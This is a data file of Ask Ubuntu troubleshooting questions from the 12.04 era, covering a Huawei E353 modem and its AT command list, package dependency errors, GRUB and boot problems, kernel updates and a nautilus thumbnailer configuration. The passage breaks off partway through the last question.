175348	my huawei e353 modem is recognized as another model and is not fully functional	i have huawei usb modem e353 . but it is just working with ubuntu 12.04 . i am able to connect to internet . but i am not able to use ixconn and gammu for retrieving messages . i need ussd functionality . please advice me on how can i acheive this . modem is detected as bus 002 device 005 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm which is not my modem . dsmeg [ 19.631536 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 19.631539 ] bluetooth : bnep filters : protocol multicast [ 19.643278 ] bluetooth : rfcomm tty layer initialized [ 19.643283 ] bluetooth : rfcomm socket layer initialized [ 19.643285 ] bluetooth : rfcomm ver 1.11 [ 19.676131 ] type=1400 audit ( 1344863502.640:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=878 comm= '' apparmor_parser '' [ 19.683977 ] type=1400 audit ( 1344863502.648:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /opt/extras.ubuntu.com/unity-lens-askubuntu/unity-askubuntu-daemon '' pid=879 comm= '' apparmor_parser '' [ 19.689801 ] type=1400 audit ( 1344863502.656:7 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=885 comm= '' apparmor_parser '' [ 19.690360 ] type=1400 audit ( 1344863502.656:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=885 comm= '' apparmor_parser '' [ 19.692185 ] type=1400 audit ( 1344863502.656:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=882 comm= '' apparmor_parser '' [ 19.694865 ] type=1400 audit ( 1344863502.660:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=882 comm= '' apparmor_parser '' [ 19.703329 ] type=1400 audit ( 1344863502.668:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=882 comm= '' apparmor_parser '' [ 19.756732 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 19.760149 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 19.771338 ] jme 0000:04:00.5 : irq 48 for msi/msi-x [ 19.793689 ] jme 0000:04:00.5 : eth0 : link is down [ 19.793904 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 19.794333 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 19.935396 ] usb 2-1.3 : usb disconnect , device number 4 [ 20.665660 ] init : plymouth-stop pre-start process ( 1228 ) terminated with status 1 [ 23.715659 ] usb 2-1.3 : new high-speed usb device number 5 using ehci_hcd [ 23.917956 ] scsi8 : usb-storage 2-1.3:1.5 [ 23.924254 ] scsi9 : usb-storage 2-1.3:1.6 [ 23.937909 ] usbcore : registered new interface driver usbserial [ 23.939217 ] usb serial support registered for generic [ 23.955579 ] usbcore : registered new interface driver usbserial_generic [ 23.955584 ] usbserial : usb serial driver core [ 23.958098 ] usb serial support registered for gsm modem ( 1-port ) [ 23.958200 ] option 2-1.3:1.0 : gsm modem ( 1-port ) converter detected [ 23.958371 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 23.958402 ] option 2-1.3:1.3 : gsm modem ( 1-port ) converter detected [ 23.958515 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 23.958531 ] option 2-1.3:1.4 : gsm modem ( 1-port ) converter detected [ 23.966980 ] usb 2-1.3 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 23.967956 ] usbcore : registered new interface driver option [ 23.967959 ] option : v0.7.2 : usb driver for gsm modems [ 24.924286 ] scsi 8:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 24.928152 ] scsi 9:0:0:0 : direct-access huawei tf card storage pq : 0 ansi : 2 [ 24.929646 ] sr1 : scsi-1 drive [ 24.930323 ] sr 8:0:0:0 : attached scsi cd-rom sr1 [ 24.931510 ] sr 8:0:0:0 : attached scsi generic sg2 type 5 [ 24.932528 ] sd 9:0:0:0 : attached scsi generic sg3 type 0 [ 24.934765 ] sd 9:0:0:0 : [ sdb ] attached scsi removable disk [ 48.003006 ] ppp bsd compression module registered [ 48.028454 ] ppp deflate compression module registered [ 2409.681560 ] show_signal_msg : 39 callbacks suppressed [ 2409.681569 ] zenity [ 4231 ] : segfault at 32 ip 080551ad sp bf85d2c0 error 4 in zenity [ 8048000+14000 ] [ 2428.536619 ] zenity [ 5181 ] : segfault at 32 ip 080551ad sp bf8cd4e0 error 4 in zenity [ 8048000+14000 ] [ 2448.815826 ] zenity [ 6305 ] : segfault at 32 ip 080551ad sp bfd8ea20 error 4 in zenity [ 8048000+14000 ] [ 2461.042574 ] zenity [ 7347 ] : segfault at 32 ip 080551ad sp bfdda330 error 4 in zenity [ 8048000+14000 ] [ 2506.407263 ] zenity [ 8422 ] : segfault at 32 ip 080551ad sp bfc90060 error 4 in zenity [ 8048000+14000 ] commands here http : //pastebin.com/7pbbnngk at commands for e353 [ * ] h manual rejection of a network request for pdp context activation ( rozłączanie połączenia ) [ * ] a manual acceptance of a network request for pdp context activation [ * ] d mobile originated call to a number ( dzwonienie ) [ * ] s0 ring before automatic answer [ * ] s3 command line termination character [ * ] s4 responds formatting character [ * ] s5 editing character [ * ] s6 pause before blind dialling [ * ] s7 wait for completion [ * ] e command echo mode ( pl : komenda ta spowoduje wyświetlanei wszystkich oidpowiedzi modemu i naszych zapytań tj . należy wysłać komendę ate1 aby wyświetlało ) [ * ] v response format [ * ] i manufacturer information about ta [ * ] t tone dialling [ * ] p pulse dialling [ * ] x connect result ( może być przydatne przy odblokowaniu rozmów ) [ * ] z reset to default configuration [ * ] q result code suppression [ * ] & c dcd-usage [ * ] & d dtr-usage ( może być przydatne przy odblokowaniu rozmów ) [ * ] & f set all ta parameters to factory defined config [ * ] +cmgs send message [ * ] +cmgw message storage [ * ] +cmgr read a message [ * ] +cmgl message list [ * ] +cmgc send command [ * ] +cmss send message from storage [ * ] +cnma new message acknowledge : at+cnma set command confirms correct reception of a new message ( sms-deliver or sms-status-report ) which is routed directly to the te . [ * ] +cscs select te character set [ * ] +cmee report mobile equipment error set command disables/enables the result code +cme error : < err > as an indication of an error relating to the functionality of the me [ * ] +creg network registration info [ * ] +csdh show text mode parameters [ * ] +cnmi new message notification setting / new message indications to te [ * ] +cgreg gprs network registration status / network registration [ * ] +cmms more messages to send [ * ] +cmgf set message format / sms format [ * ] +cgsms select service for mo sms messages / message bearer domain command [ * ] +csca service centre address / smsc number command [ * ] +csms select message service [ * ] +csmp set text mode parameters ( sms ) [ * ] +cpms message storage selection / preferred message storage [ * ] +cmgd delete message [ * ] +cscb select cell broadcast message type [ * ] ^rstrigger ******************** -- -- -- brak -- -- -- ******************** [ * ] +clip calling line identification presentation [ * ] +clir calling line identification restriction [ * ] +colp connected line identification presentation [ * ] +clcc list current calls [ * ] +cpas phone activity status [ * ] +csta select type of address [ * ] +ccug closed user group [ * ] +cssn supplementary service notification [ * ] +chld call hold and multiparty [ * ] +chup hang up call ( this command implements the same behave as ath . ) [ * ] +vts dtmf and tone generation [ * ] ^dtmf command for sending dtmf key value [ * ] +crc cellular result codes / command for setting the cell result codes [ * ] +cbst select bearer service type / command for setting the bearer service type [ * ] +cmod call mode ( może być przydatne przy uaktywnianiu rozmów ) [ * ] ^als ******************** -- -- -- brak -- -- -- ******************** [ * ] +cuus1 user to user signalling service 1 ( 27007-a50.pdf ) [ * ] ^cdur call duration query command ( em770_at_ modem at command .pdf ) [ * ] +cgdcont define pdp context / pdp environment setting command / command for defining the pdp context [ * ] +cgeqneg quality of service profile ( negotiated ) / command for requesting 3g quality of service profile ( negotiated ) [ * ] +cgdscont define secondary pdp context ( 27007-a50.pdf ) [ * ] +cgeqreq 3g quality of service profile ( requested ) ( 27007-a50.pdf ) [ * ] +cgeqmin 3g quality of service profile ( minimum acceptable ) ( 27007-a50.pdf ) [ * ] +cgpaddr show pdp address / show pdp address ( es ) [ * ] +cgcmod pdp context modify ( 27007-a50.pdf ) [ * ] +cgact pdp context activate or deactivate / command for activating or deactivating the pdp context [ * ] +cgans manual response to a network request for pdp context activation ( ctfpnd-3_at_command_reference.pdf ) ( 27007-a50.pdf ) [ * ] +cgtft traffic flow template read dynamic parameters ( 27007-a50.pdf ) [ * ] ^cgdns ******************** -- -- -- brak -- -- -- ******************** [ * ] +cgauto automatic response to a network request for pdp context activation [ * ] +cgdata enter data state [ * ] ^trig ******************** -- -- -- brak -- -- -- ******************** [ * ] ^gcfind ******************** -- -- -- brak -- -- -- ******************** [ * ] +cgatt ps attach or detach / command for attaching the mt to or detaching the mt from the gprs service [ * ] ^cgcatt ******************** -- -- -- brak -- -- -- ******************** [ * ] +cops operator selection / plmn selection / command for selecting operators [ * ] +cgclass gprs mobile station class ( tryby ps / cs ) [ * ] at+cfun ? set phone functionality / command for setting the work mode [ * ] +cgmi request manufacturer identification / manufacturer information query command / command for querying the vendor information [ * ] +cgmm request model identification / product model id command / command for querying the product mode [ * ] +gmm ta model identification / querying the product model number request [ * ] +cgmr request revision identification / software version number query command / command for querying the software version number [ * ] +cgsn request product serial number identification / imei query command [ * ] +gsn request ta serial number / imei query command [ * ] +cimi request international mobile subscriber identity / imsi query command [ * ] +csq signal quality / rssi query function command [ * ] ^cbnd '' at^cbnd ? '' zwraca aktualne ustawienie `` band '' modemu z komendy `` at^syscfg '' [ * ] ^cpdw ******************** -- -- -- brak -- -- -- ******************** może ma cos wspólnego z cpwd ( g20software.pdf g20 at commands.book ) [ * ] ^hwver command for querying hardware version number / hardware version number query function [ * ] ^hver hardware version number query function ( takie smao jak ^hwver ) [ * ] ^fhver zwraca : `` model modemu wersję firmware , wersję hardware '' np . `` e353s-2a 21.157.06.00.264 , ch2e353sm ver.a '' [ * ] ^pfver zwraca ciąg znaków v3r i `` compile date / time '' [ * ] +clac list all available at commands [ * ] ^sn zwraca serial number ( numer seryjny urządzenia ) [ * ] +gcap request overall capabilities for ta / the complete capabilities list command ( +gcap ) should indicate the major capability areas of the ta ( 27007-a50.pdf ) [ * ] ^srvst command for indicating service state change / service state change indication [ * ] ^mode system mode change event indication / command for indicating system mode change event ( coś nie chce działać , moze być przydatne do podtrzyumania hspa+ ) [ * ] ^simst sim state change indication ( coś nie chce działać , moze być przydatne do rozpoznawania braku ps w modemie i karcie aero2 ) [ * ] ^hs te-ms handshake function command / command for handshaking between ms and te [ * ] +cpls selection of preferred plmn list ( 27007-a50.pdf ) [ * ] +cpol preferred operator list / preferred plmn list [ * ] +cpbs phonebook memory selection / command for selecting the phone book memory [ * ] ^cpbr phonebook reading / command for reading the phone book [ * ] +cpbr read phonebook entries / checking the parameter range supported by the +cpbr command ( huawei_mu509_hsdpa_lga_module_at_command_interface_specification- ( v100r001_01 , english ) .pdf ) [ * ] ^cpbw command for writing the phone book / phonebook writing [ * ] +cpbw write phonebook entry / write phonebook entries [ * ] ^scpbw write phonebook ( lc6341 at command set user manual 201154154055464.pdf ) [ * ] ^scpbr read phonebook ( lc6341 at command set user manual 201154154055464.pdf ) [ * ] +cnum subscriber number [ * ] +cpbf find phonebook entries / command for querying phonebook query [ * ] +csim generic sim access ( 27007-a50.pdf ) [ * ] +cpin enter pin / pin management command [ * ] ^iccid '' at^iccid ? '' return integrated circuit card identification from the sim card ( rim_1802g_rim_1902g_at_commands_guide.pdf ) [ * ] ^cpin pin management command ^cpin ( new feature ) / command for manage pin ( indicate remaining password input times ) [ * ] +crsm command for accessing a sim card through restricted sim access / restricted sim access [ * ] ^pnn efpnn ( plmn network name ) - contains the full and short form version of the network name for the registered plmn . if the operator name source is cphs operator name string long and short form , refer to < indvalue > , the following two sim elementary files are used : efonstring ( operator name string ) - contains the name of the plmn operator who issued the sim . efopshort ( operator name short form ) - contains a short form of the name of the plmn operator who issued the sim . ( s000453c.pdf ) ******************** -- -- -- brak -- -- -- ******************** [ * ] ^cpnn ******************** -- -- -- brak -- -- -- ******************** [ * ] ^opl efopl ( operator plmn list ) - contains the plmn identification and location id together with the index of the corresponding pnn record . ******************** -- -- -- brak -- -- -- ******************** [ * ] ^cardlock card lock command / at^cardlock is used for unlock the datacard . when the sim card which is not allowed by the operator ( called illegal sim card ) is inserted into the datacard , the datacard can detect it is a illegal sim card and require a unlock code before it can register the network . if the right unlock code is inputted , the datacard is unlocked and then any other opertator’s sim card can work in this datacard . if the wrong unlock code inputted exceeds 10 times , the datacard is locked forever and only the sim card which is allowed by the operator ( called legal sim card ) can work with this datacard . [ * ] +ccwa call waiting / command for reporting of call waiting [ * ] +ccfc call forwarding number and conditions / call forwarding command [ * ] +cusd unstructured supplementary service / ussd command [ * ] ^cmlck '' at^cmlck= ? '' zwraca : `` ^cmlck : ( `` ps '' ) '' ******************** -- -- -- brak -- -- -- ******************** [ * ] +clck facility lock / pin enabling and query function [ * ] +cpwd change password / pin password modifying [ * ] ^cdsf ******************** -- -- -- brak -- -- -- ******************** [ * ] ^cdcf ******************** -- -- -- brak -- -- -- ******************** [ * ] ^cdqf ******************** -- -- -- brak -- -- -- ******************** [ * ] ^dsflowclr ds traffic reset [ * ] ^dsflowqry ds traffic query [ * ] ^dsflowrpt ds traffic reporting [ * ] ^cpam central processor auxiliary magazine : ) ) ) / control plane assurance magazine : ) ) ) ******************** -- -- -- brak -- -- -- ******************** [ * ] ^time ******************** -- -- -- brak -- -- -- ******************** [ * ] +ctzr time zone reporting [ * ] ^stsf sim toolkit set facilities ( tf_piml plus_at_commands_interface_guide1.pdf ) [ * ] ^stgi command not support sim toolkit get information ( tf_piml plus_at_commands_interface_guide1.pdf ) [ * ] ^stgr sim toolkit give response ( tf_piml plus_at_commands_interface_guide1.pdf ) [ * ] ^imsichg command not support ******************** -- -- -- brak -- -- -- ******************** [ * ] ^pdpstub ******************** -- -- -- brak -- -- -- ******************** [ * ] ^cwas ******************** -- -- -- brak -- -- -- ******************** [ * ] ^cgas ******************** -- -- -- brak -- -- -- ****************** [ * ] ^mfreelocksize '' at^mfreelocksize ? '' zwraca : `` ^mfreelocksize : liczba '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^cpuload '' at^cpuload ? '' zwraca : `` ^cpuload:0 ok '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^cellinfo ******************** -- -- -- brak -- -- -- ****************** [ * ] ^meanrpt zwraca 0 ******************** -- -- -- brak -- -- -- ****************** [ * ] ^ccc ******************** -- -- -- brak -- -- -- ****************** [ * ] ^spn return ( u ) sim card 's / service provider name / command for getting service provider name [ * ] ^cardmode unsolicited result code control ( 201154154055464.pdf ) [ * ] ^curc unsolicited report control command / command for controlling unsolicited report [ * ] ^cmsr ******************** -- -- -- brak -- -- -- ****************** [ * ] ^cmgi ******************** -- -- -- brak -- -- -- ****************** [ * ] ^cmmt ******************** -- -- -- brak -- -- -- ****************** [ * ] ^authdata ******************** -- -- -- brak -- -- -- ****************** [ * ] ^dhcp ( można sprawdzać po połączeniu ) ******************** -- -- -- brak -- -- -- ****************** [ * ] ^crpn ******************** -- -- -- brak -- -- -- ****************** [ * ] ^glasterr ******************** -- -- -- brak -- -- -- ****************** [ * ] ^ndisdup ( łączy modem w trybie ndis ) ******************** -- -- -- brak -- -- -- ****************** [ * ] ^ndisconn ******************** -- -- -- brak -- -- -- ****************** [ * ] ^ndisstatqry ( wyświetla informacje o połączneiu ndis ) ******************** -- -- -- brak -- -- -- ****************** [ * ] ^ndisadd '' at^ndisadd= ? '' zwraca : `` ^ndisadd : ( 0-1 ) , ( ip_address ) , ( primary_dns ) , ( secondary_dns ) , ( primary_nbns ) , ( secondary_nbns ) '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^dnsp '' at^dnsp= ? '' zwraca `` ^dnsp : ( -primarydns- ) '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^dnss '' at^dnss '' zwraca `` ^dnss : ( -secondarydns- ) '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^dloadver zwraca wersję bootyloadera ( oem sbl ) w download mode ? ******************** -- -- -- brak -- -- -- ****************** [ * ] ^dloadinfo interesująca funkcja . zwraca takze wartość ^mode np . : '' at^dloadinfo ? swver:21.157.06.00.264 isover : utps21.005.11.10.264_mac21.005.11.08.264 webuiver : product name : e353s-2a dload type:0 ok ^mode : 5,9 '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^nvbackup all backs up items stored in non-volatile memory ******************** -- -- -- brak -- -- -- ****************** [ * ] ^nvrestore zapewne przywraca backup ******************** -- -- -- brak -- -- -- ****************** [ * ] ^authorityver zwraca wersję ? czegoś ? ( imei ? ) `` at^authorityver ? 1000 ok '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^authorityid zwraca imei i drguą liczbę po precinku : '' at^authorityid ? imei,0 ok '' ******************** -- -- -- brak -- -- -- ****************** [ * ] ^godload przełącza w tryb download mode ( oem sbl ) bądź bootloadera . ******************** -- -- -- brak -- -- -- ****************** [ * ] at^reset resetuje modem , uruchamia ponownie możliwe , że do ustawień fabrycznych . ******************** -- -- -- brak -- -- -- ****************** [ * ] ^nvrststts ******************** -- -- -- brak -- -- -- ****************** [ * ] ^hwnatqry '' at^hwnatqry ? '' zwraca liczbę ******************** -- -- -- brak -- -- -- ****************** [ * ] ^flashinfo zwraca jakieś adresy w pamięci ? ******************** -- -- -- brak -- -- -- ****************** [ * ] ^comm ******************** -- -- -- brak -- -- -- ****************** [ * ] ^hspa ******************** -- -- -- brak -- -- -- ****************** [ * ] ^csnr '' at^csnr ? '' zwraca dwie liczby , analzia pochodzi z : http : //knol.google.com/k/modem-based-3g-signal-analysis # range ( snr-a ) , ( snr-b ) : ( -145 -- 60 ) , ( -32-0 ) in response to the csnr command , the modem responds with two numbers . due to not knowing exactly how these numbers are measured and calculated ( see modem specifics ) , they have been termed snr-a and snr-b . ( -145 -- 60 ) means that snr-a response from the modem will be a number from -145 to -60 ( -32-0 ) means that : snr-b response from the modem will be a number from -32 to 0 snr-a ⇀snr-a value returned from the modem note that , unlike in the rssi case , we defer explaining the meaning of snr-a for later , subject to further investigation . this due to not knowing what the modem is exactly measuring in this case . snr-b ⇀ snr-b value returned from the modem note that , unlike in the rssi case , we defer explaining the meaning of snr-b for later , subject to further investigation . this is due to not knowing what the modem is exactly measuring in this case . ******************** -- -- -- brak -- -- -- ****************** [ * ] ^freqlock ( kanały do blokownaia na modemie ? ) ******************** -- -- -- brak -- -- -- ****************** [ * ] ^cfplmn '' at^cfplmn ? '' wyswietla listę operatorów do których się nie zalogoaliśmy ? ******************** -- -- -- brak -- -- -- ****************** [ * ] ^cqst przyjmuje dwie wartości , 1 i 0 ******************** -- -- -- brak -- -- -- ****************** [ * ] ^caatt przyjmuje dwie wartości , 1 i 0 ******************** -- -- -- brak -- -- -- ****************** [ * ] ^sysinfo zwraca sporo informacji , wyjasnienai są dostępne [ * ] ^syscfg ustawienia , częstotliwości , trybu sieci etc . [ * ] ^rxdiv [ * ] ^pcscinfo [ * ] ^cellsrch [ * ] +clvl [ * ] ^vmset [ * ] ^cdtmfs [ * ] ^cdtmfe [ * ] +gmi [ * ] +gmr [ * ] ^setport [ * ] ^vertime [ * ] ^aphplmn [ * ] ^anquery [ * ] ^appwronreg [ * ] ^apthroughput [ * ] ^apconnst [ * ] ^wifiglobalmac [ * ] ^scid [ * ] +csqlvl [ * ] ^csqlvlext [ * ] ^appdmver [ * ] ^authver [ * ] ^ipv6cap [ * ] ^dhcpv6 [ * ] ^aprainfo [ * ] ^aplanaddr
175352	how to install gtk+ `` clearlooks '' and `` murrine '' to fix this problem on ubuntu with mate ?	this message says that the theme will not work correctly until i install the gtk+ `` clearlooks '' and this another message says that the theme will not work correctly until i install the gtk+ `` murrine '' and the same happen when i try gtk+ `` smooth '' themes how to fix this problem ? obs . : i 'm using ubuntu 11.10 with mate .
175353	problem with youtube under 12.04	i have a problem running youtube videos . when i load the page it is as if it lacks css and the block for video is just pure black . i have a flash plug-in and it is working ( tested on several sites ) but just the youtube is messed up . any ideas ?
175355	unable to sudo tasksel	when i type the command sudo tasksel i get a list of server packages i can install . i only have basic ubuntu server installed at moment . my version is 12.04 . when i select for example samba file server and ok it i get an error . tasksel : aptitude failed ( 100 ) . i also get errors trying to sudo apt-get install ubuntu-desktop . ( unable to locate package ) i can ping google and other site and i do seem to have internet connectivity . please help .
175356	can not boot windows after deleting ubuntu partition and can not boot from cd also .	i have the problem of having the unknown filesystem : rescue grub screen come up . i recently deleted the partition of my hard drive that had ubuntu studio on it in an effort to clear up more space on my computer . i also have windows 7 installed on the computer . also i can not access the bios and there is no splash screen option for me to boot from cd . please help .
175364	dependency problems installing eviacam on 12.04	i used eviacam in windows , but now i 'm using ( l ) ubuntu 12.04 , and i fail to install . i found a guide to install it on ubuntu 11.10 , but i have unsolved dependencies . error runing `` sudo apt-get install libcv2.1 libhighgui2.1 libwxbase2.8-0 libwxgtk2.8-0 '' reading package lists ... done building dependency tree reading state information ... done package libcv2.1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libhighgui2.1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libcv2.1 ' has no installation candidate e : package 'libhighgui2.1 ' has no installation candidate link to the guide edit : i 've aded their repository , and updated . unsolved depencies again : ergo @ ikarusii : ~ $ sudo apt-get install eviacam reading package lists ... done building dependency tree reading state information ... done recommended packages : wx2.8-i18n the following packages will be upgraded : eviacam 1 upgraded , 0 newly installed , 0 to remove and 88 not upgraded . 1 not fully installed or removed . need to get 5,235 kb of archives . after this operation , 468 kb disk space will be freed . get:1 http : //ppa.launchpad.net/cesar-crea-si/eviacam/ubuntu/ precise/main eviacam i386 1.5.4-0ubuntu1~precise [ 5,235 kb ] fetched 5,235 kb in 18s ( 287 kb/s ) dpkg : dependency problems prevent configuration of eviacam : eviacam depends on libcv2.1 ; however : package libcv2.1 is not installed . eviacam depends on libhighgui2.1 ; however : package libhighgui2.1 is not installed . dpkg : error processing eviacam ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : eviacam e : sub-process /usr/bin/dpkg returned an error code ( 1 )
175367	pointing email ( thunderbird ) to a flash drive	i carry my thunderbird profile on a usb flash drive so that i can access it from multiple computers . how can i point thunderbird to that drive in ubuntu ?
175369	how do i disable ctrl-alt-d in gnome-shell ?	i am using gnome 3 and gnome-shell ( not gnome classic ) on ubuntu 12.04 lts with emacs . i would like to use the keyboard shortcut ctrl+alt+d with emacs , however whenever i hit that keystroke , gnome intercepts it and hides all windows . i have tried to disable it under settings > keyboard > shortcuts > navigation > hide all normal windows . it appears disabled there , but if i hit ctrl+alt+d all windows will still minimize . my next step was to try and use dconf-editor to disable it under org.gnome.desktop.wm.keybindings , but i could n't find any option for `` hide all windows '' ( or anything similar ) there . any help would be appreciated , thanks .
175374	where is ubuntu installed ?	i installed ubuntu 12.04 along with windows xp . but now on the boot menu ubuntu does n't show up . i checked the drive in wich i installed ubuntu , and that drive is also empty.. what do i do now ?
175378	how to get an ubuntu system that boots to the command line to start the gui ?	as the title above , i am totally new to linux . what i have now is a virtual hardisk with ubuntu and it started up as cli . what i want to do is enable the graphic mode and able to switch it flexibly . so , i wanted to install ubuntu-desktop due to the fact that ubuntu only started in terminal mode and i could n't get startx command to run too . the startx command ended up by open a cli with white screen . right now , i ran `` sudo apt-get install ubuntu-desktop '' but i dun know how to enable it or activate it . can anyone please kindly brief me about that ? between , my internet connection is bad , so that i wonder is there any alternative way in order to complete update or upgrade in this portion ? p/s : currently my ubuntu ver is 12.04.1 and i dun think to have a clean install . because i backup the ubuntu into virtual hardisk with some software well installed and also configured . the installers of those software are not with me . so what i can do is only troubleshooting or do some update or upgrade . the snapshot on results of startx and xorg.0.log attached as below : xorg.0.txt
175382	how to find out console equivalents of ubuntu system settings gui ?	how do i in general find out , what the very nice `` system settings gui '' in ubuntu ( say 12.04 ) does and how to replicate the changes in command line ? many people ask questions like `` how to change the keyboard rate using command line '' , and often the answers do not help and are hard to find . what is the easiest way to find out , what the gui is actually changing ( for various types of settings . i.e . keyboard layout , rate , mouse , network , ... )
175383	minecraft done loading error 12.04 ubuntu . how to fix it ?	i want to buy minecraft and i decided first to go for the trial and see how it works . installed oracle java and when i started the game it would always stuck at done loading . deleted the bin folder in .minecraft , still the same issue . deleted the .minecraft folder , still the same issue . has anyone experienced t ; his issue on 12.04 . is there a way to fix it and enjoy the trial ? below is my java version java -version java version `` 1.7.0_05 '' java ( tm ) se runtime environment ( build 1.7.0_05-b05 ) java hotspot ( tm ) server vm ( build 23.1-b03 , mixed mode ) thanks in advance !
175385	why is apt no longer updating the kernel ?	somehow i got a 12.04 server to stop updating the kernel . it 's stuck at 3.2.0-24-generic and does n't want to fetch any new updates . the new kernel at the moment is 3.2.0-29 apt-get clean & & sudo apt-get autoremove apt-get -f install apt-get update apt-get dist-upgrade shows `` 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . '' there were no failed installs . /var/log/aptitude does n't show any errors my sources.list : # # # # # # ubuntu main repos deb http : //ca.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ precise main restricted # # # # # # ubuntu update repos deb http : //ca.archive.ubuntu.com/ubuntu/ precise-security main restricted deb http : //ca.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ precise-security main restricted deb-src http : //ca.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # # # # # ubuntu partner repo deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner anyone know what 's wrong ? thanks
175386	installing ubuntu 12.04 from a persistent bootable usb stick with installed packages	my question is if is it possible to install a customized liveusb ( ubuntu with some extra packages installed ) into a pc with those changes . meaning if i install restricted packages in my usb i can guarantee those files to be installed into the pc as well . thanks in advance , and sorry for my bad english .
175387	is there a simple tutorial for ldap ?	i 'm looking for something targeted at a complete beginner . it 's not setting up the package itself that i 'm concerned with , but rather a way to set up a schema .
175388	ubuntu installation failed	i installed ubuntu using usb ( pen drive ) . the first time , i could not download all updates . `` restart now '' is displayed , so i restart my computer while still connected to the usb drive . after restart , it normally booted windows 7 . no boot screen message to choose which os to boot ( windows or ubuntu ) . i am still able to run ubuntu after i connect my usb drive . please tell me , how can i solve this problem ?
175401	how to convert chm to pdf in ubuntu ?	i have a large chm file but tired of clicking next button . what 's the best way to convert them to pdf ? p.s : terminal way please .
175404	how to add space to exec path in a thumbnailer descrption ?	i wish to use mplayer to generate thumbnails for nautilus , so i wrote a perl script as the thumbnailer named `` gnome_thumbnailer_with_mplayer '' , and wrote a description in /usr/share/thumbnailers to tell the system to find the thumbnailer . at the beginning , the description is : [ thumbnailer entry ] tryexec=/home/allfox/programs/gnome_thumbnailer_with_mplayer exec=/home/allfox/programs/gnome_thumbnailer_with_mplayer % u % o % s mimetype=application/vnd.rn-realmedia ; application/mxf ; application/ogg ; application/ram ; application/sdp ; application/vnd.ms-wpl ; application/x-extension-m4a ; application/x-extension-mp4 ; application/x-flash-video ; application/x-matroska ; application/x-netshow-channel ; application/x-ogg ; application/x-quicktimeplayer ; application/x-shorten ; image/vnd.rn-realpix ; image/x-pict ; misc/ultravox ; text/x-google-video-pointer ; video/3gpp ; video/dv ; video/fli ; video/flv ; video/mp2t ; video/mp4 ; video/mp4v-es ; video/mpeg ; video/msvideo ; video/ogg ; video/quicktime ; video/vivo ; video/vnd.divx ; video/vnd.rn-realvideo ; video/vnd.vivo ; video/webm ; video/x-anim ; video/x-avi ; video/x-flc ; video/x-fli ; video/x-flic ; video/x-flv ; video/x-m4v ; video/x-matroska ; video/x-mpeg ; video/x-ms-asf ; video/x-ms-asx ; video/x-msvideo ; video/x-ms-wm ; video/x-ms-wmv ; video/x-ms-wmx ; video/x-ms-wvx ; video/x-nsv ; video/x-ogm+ogg ; video/x-theora+ogg ; video/x-totem-stream ; audio/x-pn-realaudio ; audio/3gpp ; audio/ac3 ; audio/amr ; audio/amr-wb ; audio/basic ; audio/midi ; audio/mp2 ; audio/mp4 ; audio/mpeg ; audio/ogg ; audio/prs.sid ; audio/vnd.rn-realaudio ; audio/x-aiff ; audio/x-ape ; audio/x-flac ; audio/x-gsm ; audio/x-it ; audio/x-m4a ; audio/x-matroska ; audio/x-mod ; audio/x-mp3 ; audio/x-mpeg ; audio/x-ms-asf ; audio/x-ms-asx ; audio/x-ms-wax ; audio/x-ms-wma ; audio/x-musepack ; audio/x-pn-aiff ; audio/x-pn-au ; audio/x-pn-wav ; audio/x-pn-windows-acm ; audio/x-realaudio ; audio/x-real-audio ; audio/x-sbc ; audio/x-speex ; audio/x-tta ; audio/x-wav ; audio/x-wavpack ; audio/x-vorbis ; audio/x-vorbis+ogg ; audio/x-xm ; application/x-flac ; everything works . but later i realized that i can sync this kind of little script to ubuntu one , so i moved the thumbnailer ( named `` gnome_thumbnailer_with_mplayer '' , not the description ) to ~/ubuntu one . then i changed the description to : [ thumbnailer entry ] tryexec=/home/allfox/ubuntu\ one/fun_goods/thumbnailer/gnome_thumbnailer_with_mplayer exec=/home/allfox/ubuntu\ one/fun_goods/thumbnailer/gnome_thumbnailer_with_mplayer % u % o % s mimetype=application/vnd.rn-realmedia ; application/mxf ; application/ogg ; application/ram ; application/sdp ; application/vnd.ms-wpl ; application/x-extension-m4a ; application/x-extension-mp4 ; application/x-flash-video ; application/x-matroska ; application/x-netshow-channel ; application/x-ogg ; application/x-quicktimeplayer ; application/x-shorten ; image/vnd.rn-realpix ; image/x-pict ; misc/ultravox ; text/x-google-video-pointer ; video/3gpp ; video/dv ; video/fli ; 